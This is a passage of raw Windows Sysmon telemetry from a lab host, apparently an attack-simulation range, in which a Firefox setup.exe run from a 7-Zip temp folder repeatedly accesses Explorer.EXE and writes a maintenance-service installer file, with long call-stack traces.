System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015034Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.411{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015033Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015032Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015031Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015030Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015029Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015028Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015027Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015026Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015025Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015024Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015023Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015022Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015021Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015020Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015019Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015018Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000015017Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:52.396{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe2021-01-18 13:59:52.396 10341000x800000000000000015016Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
